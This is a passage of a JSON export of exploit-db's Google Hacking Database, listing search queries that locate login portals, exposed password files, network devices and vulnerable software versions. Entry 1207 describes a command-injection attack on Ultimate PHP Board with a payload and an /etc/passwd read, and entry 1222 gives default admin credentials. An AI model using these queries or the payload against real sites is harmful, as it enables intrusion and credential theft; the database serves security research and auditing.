"inurl:course/category.php | inurl:course/info.php | inurl:iplookup/ipatlas/plot.php", "textualDescription": "Moodle" }, { "signatureReferenceNumber": "1179", "link": "https://www.exploit-db.com/ghdb/1179/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+XOOPS+2.2.3+Final%22", "shortDescription": "\"Powered by XOOPS 2.2.3 Final\"", "textualDescription": "XOOPS 2.2.3 Arbitrary local file inclusionThis a generic dork for the version I tested, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html" }, { "signatureReferenceNumber": "1180", "link": "https://www.exploit-db.com/ghdb/1180/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%22wfdownloads%2Fviewcat.php%3Flist%3D%22", "shortDescription": "inurl:\"wfdownloads/viewcat.php?list=\"", "textualDescription": "XOOPS WF_Downloads (2.05) module SQL injectionThis a specific dork, that searches XOOPS sites with WF_Downloads module installed, advisory & poc exploit:http://rgod.altervista.org/xoops_xpl.html" }, { "signatureReferenceNumber": "1181", "link": "https://www.exploit-db.com/ghdb/1181/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22OnLine+Recruitment+Program+-+Login%22+-johnny.ihackstuff", "shortDescription": "intitle:\"OnLine Recruitment Program - Login\" -johnny.ihackstuff", "textualDescription": "This is the Employer's Interface of eRecruiter, a 100% Paper Less Recruitment Solution implemented by Universal Virtual Office. The only time you need to use paper is when you give out the appointment letter.The access to the Employer's Zone is restricted to authorized users only. Please authenticate your identity." }, { "signatureReferenceNumber": "1182", "link": "https://www.exploit-db.com/ghdb/1182/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22EXTRANET+*+-+Identification%22+-johnny.ihackstuff&hl=en&filter=0", "shortDescription": "intitle:\"EXTRANET * - Identification\"", "textualDescription": "WorkZone Extranet Solution login page. All portals are in french or spanish I belive." }, { "signatureReferenceNumber": "1183", "link": "https://www.exploit-db.com/ghdb/1183/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22EXTRANET+login%22+-.edu+-.mil+-.gov+-johnny.ihackstuff&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"EXTRANET login\" -.edu -.mil -.gov -johnny.ihackstuff", "textualDescription": "This search finds many different Extranet login pages." }, { "signatureReferenceNumber": "1184", "link": "https://www.exploit-db.com/ghdb/1184/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22*-+HP+WBEM+Login%22+%7C+%22You+are+being+prompted+to+provide+login+account+information+for+*%22+%7C+%22Please+provide+the+information+requested+and+press+the+OK+button+to+complete+the+login+process%22+%7C+%22%3C!", "shortDescription": "intitle:\"*- HP WBEM Login\" | \"You are being prompted to provide login account information for *\" | \"Please provide the information requested and press", "textualDescription": "HP WBEM Clients are WBEM enabled management applications that provide the user interface and functionality system administrators need to manage their environment." }, { "signatureReferenceNumber": "1185", "link": "https://www.exploit-db.com/ghdb/1185/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=intitle%3A%22Novell+Web+Services%22+%22GroupWise%22+-inurl%3A%22doc%2F11924%22+-.mil+-.edu+-.gov+-filetype%3Apdf&btnG=Search&filter=0", "shortDescription": "intitle:\"Novell Web Services\" \"GroupWise\" -inurl:\"doc/11924\" -.mil -.edu -.gov -filetype:pdf", "textualDescription": "Novell GroupWise is a complete collaboration software solution that provides information workers with e-mail, calendaring, instant messaging, task management, and contact and document management functions. The leading alternative to Microsoft Exchange, GroupWise has long been praised by customers and industry watchers for its security and reliability." }, { "signatureReferenceNumber": "1186", "link": "https://www.exploit-db.com/ghdb/1186/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%22iCONECT+4.1+%3A%3A+Login%22&btnG=Search", "shortDescription": "\"iCONECT 4.1 :: Login\"", "textualDescription": "This search finds the login page for iCONECTnxt, it enables firms to search, organize, and review electronic and document discovery information \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d including email, native files, and images \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c2\u009d from anywhere in the world for easy collaboration with outside counsel, branch offices, and consultants. LAN and Web solutions available." }, { "signatureReferenceNumber": "1187", "link": "https://www.exploit-db.com/ghdb/1187/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22Powered+by+Merak+Mail+Server+Software%22+-.gov+-.mil+-.edu+-site%3Amerakmailserver.com+-johnny.ihackstuff&filter=0", "shortDescription": "\"Powered by Merak Mail Server Software\" -.gov -.mil -.edu -site:merakmailserver.com -johnny.ihackstuff", "textualDescription": "Webmail login portals for Merak Email ServerMerak Email Server Suite consists of multiple awards winner Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWare" }, { "signatureReferenceNumber": "1188", "link": "https://www.exploit-db.com/ghdb/1188/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Merak+Mail+Server+Web+Administration%22+-ihackstuff.com&num=100&&filter=0", "shortDescription": "intitle:\"Merak Mail Server Web Administration\" -ihackstuff.com", "textualDescription": "User login pages for Merak Email Server Suite which consists of Merak Email Server core and optional components:* Email Server for Windows or Linux* Anti-Spam Protection* Anti-Virus Protection* Integrated WebMail Access* Instant Messaging* GroupWaremore info: h**p://www.icewarp.com" }, { "signatureReferenceNumber": "1189", "link": "https://www.exploit-db.com/ghdb/1189/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=ext%3Ayml+database+inurl%3Aconfig", "shortDescription": "ext:yml database inurl:config", "textualDescription": "Ruby on Rails is a MVC full-stack framework for development of web applications. There's a configuration file in this framework called database.yml that links the Rails with the DB. It contains all the info needed to access de DB including username and password in clear text." }, { "signatureReferenceNumber": "1190", "link": "https://www.exploit-db.com/ghdb/1190/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22This+is+a+restricted+Access+Server%22+%22Javascript+Not+Enabled!%22%7C%22Messenger+Express%22+-edu+-ac&num=100&filter=0", "shortDescription": "\"This is a restricted Access Server\" \"Javascript Not Enabled!\"|\"Messenger Express\" -edu -ac", "textualDescription": "Mostly Login Pages for iPlanet Messenger Express, which is a web-based electronic mail program that enables end users to access their mailboxes using a browser. Messenger Express clients send mail to a specialized web server that is part of iPlanet Messaging Server. Thanks to the forum members for cleaning up the search." }, { "signatureReferenceNumber": "1191", "link": "https://www.exploit-db.com/ghdb/1191/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:webvpn.html+%22login%22+%22Please+enter+your%22&num=100&filter=0", "shortDescription": "inurl:webvpn.html \"login\" \"Please enter your\"", "textualDescription": "The Cisco WebVPN Services Module is a high-speed, integrated Secure Sockets Layer (SSL) VPN services module for Cisco products." }, { "signatureReferenceNumber": "1192", "link": "https://www.exploit-db.com/ghdb/1192/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22SNOIE+Intel+Web+Netport+Manager%22+OR+intitle%3A%22Intel+Web+Netport+Manager+Setup%2FStatus%22", "shortDescription": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "textualDescription": "Intel Netport Express Print Server." }, { "signatureReferenceNumber": "1193", "link": "https://www.exploit-db.com/ghdb/1193/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Establishing+a+secure+Integrated+Lights+Out+session+with%22+OR+intitle:%22Data+Frame+-+Browser+not+HTTP+1.1+compatible%22+OR+intitle:%22HP+Integrated+Lights-Out+Login%22+%7C+%22Alert%27+panel+is+displayed,+you+must+selec", "shortDescription": "\"Establishing a secure Integrated Lights Out session with\" OR intitle:\"Data Frame - Browser not HTTP 1.1 compatible\" OR intitle:\"HP Integrated Lights-", "textualDescription": "iLo and related login pages !? Whoops.." }, { "signatureReferenceNumber": "1194", "link": "https://www.exploit-db.com/ghdb/1194/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=inurl:nnls_brand.html+OR+inurl:nnls_nav.html&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "inurl:nnls_brand.html OR inurl:nnls_nav.html", "textualDescription": "Novell Nterprise Linux Services detection dork. Some of the features are:* iFolder* Samba* NetStorage* eDirectory Administration* Linux User Management* NMAS 2.3* NetMail 3.5* GroupWise 6.5* iPrint* Virtual Office" }, { "signatureReferenceNumber": "1195", "link": "https://www.exploit-db.com/ghdb/1195/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+F-Secure+Policy+Manager+Server+Welcome+Page%22&filter=0", "shortDescription": "intitle:\"Welcome to F-Secure Policy Manager Server Welcome Page\"", "textualDescription": "An attacker may want to know about the antivirus software running. The description says he can check the status of the F-Secure Policy Manager Server's Host Module. He can also check the status of the Console Module, but only if he's reading the page from the local host." }, { "signatureReferenceNumber": "1196", "link": "https://www.exploit-db.com/ghdb/1196/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Summit+Management+Interface%22+-georgewbush.org.uk&num=50&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "textualDescription": "Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10" }, { "signatureReferenceNumber": "1197", "link": "https://www.exploit-db.com/ghdb/1197/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Cisco+%22You+are+using+an+old+browser+or+have+disabled+javascript.+You+must+use+version+4+or+higher+of+Netscape+Navigator/Communicator%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "textualDescription": "Login pages for Ciso VPN Concentrator stuff" }, { "signatureReferenceNumber": "1198", "link": "https://www.exploit-db.com/ghdb/1198/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?&q=intitle%3A%22Iomega+NAS+Manager%22+-ihackstuff.com&filter=0", "shortDescription": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "textualDescription": "Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future." }, { "signatureReferenceNumber": "1199", "link": "https://www.exploit-db.com/ghdb/1199/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22This+website+was+created+with+phpWebThings+1.4%22", "shortDescription": "\"This website was created with phpWebThings 1.4\"", "textualDescription": "This is Secunia advisory:http://secunia.com/advisories/17410/and my exploit that show a new vulnerability in \"msg\" parameter:http://rgod.altervista.org/phpwebth14_xpl.html" }, { "signatureReferenceNumber": "1200", "link": "https://www.exploit-db.com/ghdb/1200/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=%22site+info+for%22+%22Enter+Admin+Password%22&filter=0", "shortDescription": "\"site info for\" \"Enter Admin Password\"", "textualDescription": "This will take you to the cash crusader admin login screen. It is my first google hack.. also try adding index.php at the end, have fun people :)" }, { "signatureReferenceNumber": "1201", "link": "https://www.exploit-db.com/ghdb/1201/", "category": "Network or vulnerability data", "querystring": "http://images.google.com/images?svnum=10&hl=en&lr=&safe=off&c2coff=1&q=inurl%3Awebalizer+filetype%3Apng+-.gov+-.edu+-.mil+-opendarwin&btnG=Search&filter=0", "shortDescription": "inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin", "textualDescription": "***WARNING: This search uses google images, disable images unless you want your IP spewed across webpages!***Webalizer is a program that organizes who is going to a Webpage, what they are looking at, what user names are entered and endless other statistics.This is a great first step in getting too much information about a website. You see any links or files that are hidden, the search can be made more specific by using other google advanced searchs.Learn more about Webalizer(http://www.mrunix.net/webalizer/)." }, { "signatureReferenceNumber": "1202", "link": "https://www.exploit-db.com/ghdb/1202/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Display+Cameras%22+intitle:%22Express6+Live+Image%22&hl=en&lr=&filter=0", "shortDescription": "Display Cameras intitle:\"Express6 Live Image\"", "textualDescription": "Express6 live video controller.Displays video from \"Netlive Cameras\" found in this search:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1416Several new cameras found in this search." }, { "signatureReferenceNumber": "1203", "link": "https://www.exploit-db.com/ghdb/1203/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22Sony+SNT-V304+Video+Network+Station%22+inurl:hsrindex.shtml&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "textualDescription": "The SNT-V304 Video Network Station.Sony's network camera control station." }, { "signatureReferenceNumber": "1204", "link": "https://www.exploit-db.com/ghdb/1204/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Copyright+2000+-+2005+Miro+International+Pty+Ltd.+All+rights+reserved%22+%22Mambo+is+Free+Software+released%22", "shortDescription": "\"Copyright 2000 - 2005 Miro International Pty Ltd. All rights reserved\" \"Mambo is Free Software released\"", "textualDescription": "this dork is for Mambo 4.5.2x Globals overwrite / remote command execution exploit:http://rgod.altervista.org/mambo452_xpl.html" }, { "signatureReferenceNumber": "1205", "link": "https://www.exploit-db.com/ghdb/1205/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=inurl%3Awp-mail.php++%2B+%22There+doesn%27t+seem+to+be+any+new+mail.%22&btnG=Search", "shortDescription": "inurl:wp-mail.php + \"There doesn't seem to be any new mail.\"", "textualDescription": "This is the WordPress script handling Post-By-Email functionality, the search is focussed on the message telling that there's nothing to process.If the script *does* have anything to progress, it will reveal the email-address of account that sent the message(s)." }, { "signatureReferenceNumber": "1206", "link": "https://www.exploit-db.com/ghdb/1206/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%28%22Skin+Design+by+Amie+of+Intense%22%29%7C%28%22Fanfiction+Categories%22+%22Featured+Stories%22%29%7C%28%22default2%2C+3column%2C+Romance%2C+eFiction%22%29&filter=0", "shortDescription": "(\"Skin Design by Amie of Intense\")|(\"Fanfiction Categories\" \"Featured Stories\")|(\"default2, 3column, Romance, eFiction\")", "textualDescription": "eFiction" }, { "signatureReferenceNumber": "1207", "link": "https://www.exploit-db.com/ghdb/1207/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+UPB%22+%28b+1.0%29%7C%281.0+final%29%7C%28Public+Beta+1.0b%29", "shortDescription": "\"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b)", "textualDescription": "dork: \"Powered by UPB\" (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can't find it in GHDB and I am surprised of how it still works... register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and... boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://216.239.59.104/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board\"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" now in config.dat we have: ... $title=\"Ultimate PHP Board \"; error_reporting(0); ini_set(\"max_execution_time\",0); system($_GET[cmd]); echo \" \"; ... in header.php we have: ... include \"./db/config.dat\"; ... so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd" }, { "signatureReferenceNumber": "1208", "link": "https://www.exploit-db.com/ghdb/1208/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22powered+by+GuppY+v4%22%7C%22Site+cr%C3%A9%C3%A9+avec+GuppY+v4%22", "shortDescription": "\"powered by GuppY v4\"|\"Site cr\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00a9 avec GuppY v4\"", "textualDescription": "Guppy remote code execution / various arbitrary inclusion issuesadvisory & poc exploit:http://rgod.altervista.org/guppy459_xpl.html" }, { "signatureReferenceNumber": "1209", "link": "https://www.exploit-db.com/ghdb/1209/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=%22Welcome+to+the+directory+listing+of%22+%22NetworkActiv-Web-Server%22&btnG=Google+Search", "shortDescription": "\"Welcome to the directory listing of\" \"NetworkActiv-Web-Server\"", "textualDescription": "this is for NetworkActiv-Web-Server directory listing" }, { "signatureReferenceNumber": "1210", "link": "https://www.exploit-db.com/ghdb/1210/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Snap+Server%22+intitle%3A%22Home%22+%22Active+Users%22&btnG=Google+Search", "shortDescription": "intitle:\"Snap Server\" intitle:\"Home\" \"Active Users\"", "textualDescription": "This an online device, you can search for unpassworded shares on Snap Appliance Server.Moderator notes:This was found by golfo on sep 8th, but he forgot to submit it (ouch).. Before that mlynch was the first to discover it. See:http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2784&highlight=snap+serverhttp://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=180" }, { "signatureReferenceNumber": "1211", "link": "https://www.exploit-db.com/ghdb/1211/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+by+Xaraya%22+%22Copyright+2005%22&filter=0", "shortDescription": "\"Powered by Xaraya\" \"Copyright 2005\"", "textualDescription": "Xaraya" }, { "signatureReferenceNumber": "1212", "link": "https://www.exploit-db.com/ghdb/1212/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&q=%22parent+directory%22+%2Bproftpdpasswd&btnG=Google+Search", "shortDescription": "\"parent directory\" +proftpdpasswd", "textualDescription": "User names and password hashes from web server backups generated by cpanel for ProFTPd. Password hashes can be cracked, granting direct access to FTP accounts. Unix passwd and shadow files can sometimes be found with this query as well." }, { "signatureReferenceNumber": "1213", "link": "https://www.exploit-db.com/ghdb/1213/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22This+website+powered+by+PHPX%22+-demo", "shortDescription": "\"This website powered by PHPX\" -demo", "textualDescription": "this is the dork for PhpX" }, { "signatureReferenceNumber": "1214", "link": "https://www.exploit-db.com/ghdb/1214/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?hl=en&q=%22Warning%3A+Installation+directory+exists+at%22+%22Powered+by+Zen+Cart%22+-demo", "shortDescription": "\"Warning: Installation directory exists at\" \"Powered by Zen Cart\" -demo", "textualDescription": "by this dork you can find fresh installations of Zen-Cartsee Full Disclosure forums fore details... ;)" }, { "signatureReferenceNumber": "1215", "link": "https://www.exploit-db.com/ghdb/1215/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Based+on+DoceboLMS+2.0%22&hl=en&lr=&start=50&sa=N", "shortDescription": "\"Based on DoceboLMS 2.0\"", "textualDescription": "advisory & poc exploit:http://rgod.altervista.org/docebo204_xpl.html" }, { "signatureReferenceNumber": "1216", "link": "https://www.exploit-db.com/ghdb/1216/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%222005+SugarCRM+Inc.+All+Rights+Reserved%22+%22Powered+By+SugarCRM%22", "shortDescription": "\"2005 SugarCRM Inc. All Rights Reserved\" \"Powered By SugarCRM\"", "textualDescription": "this is the dork for Sugar Suite 3.5.2a & 4.0beta remote code execution issue, advisory & poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html" }, { "signatureReferenceNumber": "1217", "link": "https://www.exploit-db.com/ghdb/1217/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=inurl%3APrinters%2Fipp_0001.asp", "shortDescription": "inurl:Printers/ipp_0001.asp", "textualDescription": "Thanks to Windows 2003 Remote Printing" }, { "signatureReferenceNumber": "1218", "link": "https://www.exploit-db.com/ghdb/1218/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=%22Powered+By+phpCOIN+1.2.2%22", "shortDescription": "\"Powered By phpCOIN 1.2.2\"", "textualDescription": "PhpCOIN 1.2.2 arbitrary remote\\local inclusion / blind sql injection / path disclosureadvisory:http://rgod.altervista.org/phpcoin122.htmlmore generic:\"Powered By phpCOIN\"to see previous verions (not tested)" }, { "signatureReferenceNumber": "1219", "link": "https://www.exploit-db.com/ghdb/1219/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by+SimpleBBS+v1.1%22*&num=100", "shortDescription": "intext:\"Powered by SimpleBBS v1.1\"*", "textualDescription": "Vulnerability DescriptionSimpleBBS contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the search module not properly sanitizing user-supplied input to undisclosed variables. This may allow an attacker to inject or manipulate SQL queries in the backend database. No further details have been provided.Solution DescriptionCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.Products:* SimpleMedia SimpleBBS 1.1 AffectedVulnerability classification:* Remote vulnerability* Input manipulation attack* Impact on integrity* Exploit unavailable* VerifiedMore info on Vuln: http://www.securityfocus.com/bid/15594" }, { "signatureReferenceNumber": "1220", "link": "https://www.exploit-db.com/ghdb/1220/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Site+powered+By+Limbo+CMS%22&hl=en&lr=&start=10&sa=N", "shortDescription": "\"Site powered By Limbo CMS\"", "textualDescription": "this is the dork for Limbo Cms" }, { "signatureReferenceNumber": "1221", "link": "https://www.exploit-db.com/ghdb/1221/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&q=inurl%3Aventrilo_srv.ini+adminpassword", "shortDescription": "inurl:ventrilo_srv.ini adminpassword", "textualDescription": "This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server." }, { "signatureReferenceNumber": "1222", "link": "https://www.exploit-db.com/ghdb/1222/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=inurl%3Aguestbook%2Fguestbooklist.asp+%22Post+Date%22+From+Country", "shortDescription": "inurl:guestbook/guestbooklist.asp \"Post Date\" From Country", "textualDescription": "A sql vulnerability has been reported in a Techno Dreams asp script, login.asp. http://search.securityfocus.com/archive/1/414708/30/0/threadedSeveral ways of finding the vulnerable file:Guestbook (the above dork): inurl:guestbook/guestbooklist.asp \"Post Date\" From Country Results 1 - 21 of 123Announcement: inurl:MainAnnounce1.asp \"show all\" Results 1 -20 of 86WebDirectory: inurl:webdirectory \"Total Available Web Sites\" Search Results 1 - 4 of 5MailingList: inurl:maillinglist/emailsadd.asp Results 1 - 6 of 6note these dorks don't find the vulnerable script; to find it change the url to /admin/login.asp or /login.asp.The default admin user/pass is admin/admin. Some results leave this info on the page and others load the page with this info already filled out." }, { "signatureReferenceNumber": "1223", "link": "https://www.exploit-db.com/ghdb/1223/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:/Merchant2/admin.mv+%7C+inurl:/Merchant2/admin.mvc+%7C+intitle:%22Miva+Merchant+Administration+Login%22+-inurl:cheap-malboro.net&num=100&hl=en&lr=&filter=0", "shortDescription": "inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:\"Miva Merchant Administration Login\" -inurl:cheap-malboro.net", "textualDescription": "Miva Merchant is a product that helps buisnesses get into e-commerce. This dork locates their admin login." }, { "signatureReferenceNumber": "1224", "link": "https://www.exploit-db.com/ghdb/1224/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22Admin+login%22+%22Web+Site+Administration%22+%22Copyright%22+&num=100&hl=en&lr=&filter=0", "shortDescription": "intitle:\"Admin login\" \"Web Site Administration\" \"Copyright\"", "textualDescription": "sift Group makes a web site administration product which can be accessed via a web browser. This dork locates their admin login." }, { "signatureReferenceNumber": "1225", "link": "https://www.exploit-db.com/ghdb/1225/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22b2evo+%3E+Login+form%22+%22Login+form.+You+must+log+in!+You+will+have+to+accept+cookies+in+order+to+log+in%22++-demo+-site:b2evolution.net&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:\"b2evo > Login form\" \"Login form. You must log in! You will have to accept cookies in order to log in\" -demo -site:b2evolution.net", "textualDescription": "b2evolution is a free open-source blogging system from b2evolution.net. This dork finds the admin login." }, { "signatureReferenceNumber": "1226", "link": "https://www.exploit-db.com/ghdb/1226/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&q=%28intitle%3AWebStatistica+inurl%3Amain.php%29+%7C+%28intitle%3A%22WebSTATISTICA+server%22%29+-inurl%3Astatsoft+-inurl%3Astatsoftsa+-inurl%3Astatsoftinc.com+-edu+-software+-rob_2926+-crack.ru+-edeco.cn", "shortDescription": "(intitle:WebStatistica inurl:main.php) | (intitle:\"WebSTATISTICA server\") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob", "textualDescription": "WebStatistica provides detailed statistics about a web page. Normally you would have to login to view these statistics but the sites have put autologin on." }, { "signatureReferenceNumber": "1227", "link": "https://www.exploit-db.com/ghdb/1227/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl%3Aproxy+%7C+inurl%3Awpad+ext%3Apac+%7C+ext%3Adat+findproxyforurl", "shortDescription": "inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl", "textualDescription": "Information about proxy servers, internal ip addresses and other network sensitive stuff." }, { "signatureReferenceNumber": "1228", "link": "https://www.exploit-db.com/ghdb/1228/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?complete=1&hl=en&lr=&q=inurl%3A%2Fcgi-bin%2Fpass.txt", "shortDescription": "inurl:/cgi-bin/pass.txt", "textualDescription": "Passwords" }, { "signatureReferenceNumber": "1229", "link": "https://www.exploit-db.com/ghdb/1229/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Emergisoft+web+applications+are+a+part+of+our%22&hl=en&filter=0", "shortDescription": "\"Emergisoft web applications are a part of our\"", "textualDescription": "Hospital patient management system, in theory it could be dangerous." }, { "signatureReferenceNumber": "1230", "link": "https://www.exploit-db.com/ghdb/1230/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%2Fimg%2Fvr.htm", "shortDescription": "inurl:/img/vr.htm", "textualDescription": "Linksys wireless G Camera." }, { "signatureReferenceNumber": "1231", "link": "https://www.exploit-db.com/ghdb/1231/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22Powered+by+CubeCart+3.0.6%22+intitle%3A%22Powered+by+CubeCart%22&btnG=Google+Search", "shortDescription": "intext:\"Powered by CubeCart 3.0.6\" intitle:\"Powered by CubeCart\"", "textualDescription": "CubeCart is an eCommerce script written with PHP & MySQL. Search CubeCart 3.0.6 portal vulnerable. The vulnerability is Remote Command Execution. See http://milw0rm.com/id.php?id=1398Moderator note: \"Moving milw0rm once again. This time hosted by asylum-networks.com. /str0ke\"" }, { "signatureReferenceNumber": "1232", "link": "https://www.exploit-db.com/ghdb/1232/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Aovcgi%2Fjovw", "shortDescription": "inurl:ovcgi/jovw", "textualDescription": "An HP Java network management tool. It is a sign that a network may not be configured properly." }, { "signatureReferenceNumber": "1233", "link": "https://www.exploit-db.com/ghdb/1233/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:Axis+inurl:%22/admin/admin.shtml%22&num=100&hl=en&lr=&safe=off&filter=0", "shortDescription": "intitle:Axis inurl:\"/admin/admin.shtml\"", "textualDescription": "similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration." }, { "signatureReferenceNumber": "1234", "link": "https://www.exploit-db.com/ghdb/1234/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=DCS+inurl:%22/web/login.asp%22&hl=en&lr=lang_en&c2coff=1&filter=0", "shortDescription": "DCS inurl:\"/web/login.asp\"", "textualDescription": "Login pages for the DCS-950 Web Camera. Even comes with a built in microphone." }, { "signatureReferenceNumber": "1235", "link": "https://www.exploit-db.com/ghdb/1235/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=*+intitle%3A%22Dell+Laser+Printer+*%22+port_0+-johnny.ihackstuff", "shortDescription": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "textualDescription": "Dell laser printers. This search finds different results that dork id 1077." }, { "signatureReferenceNumber": "1236", "link": "https://www.exploit-db.com/ghdb/1236/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&c2coff=1&q=filetype%3Abak+createobject+sa", "shortDescription": "filetype:bak createobject sa", "textualDescription": "This query searches for files that have been renamed to a .bak extension (obviously), but includes a search for the characters \"sa\" (default SQL server admin id) and \"createobject\" which is requisite VBScript for opening some sort of odbc/ado connection. Since the sql id and password are plain text, it's easy to connect to the SQL server once you have this information... especially those that use \"server=127.0.0.1\" so you know IIS & SQL Server are running on the same box." }, { "signatureReferenceNumber": "1237", "link": "https://www.exploit-db.com/ghdb/1237/", "category": "Pages containing login portals", "querystring": 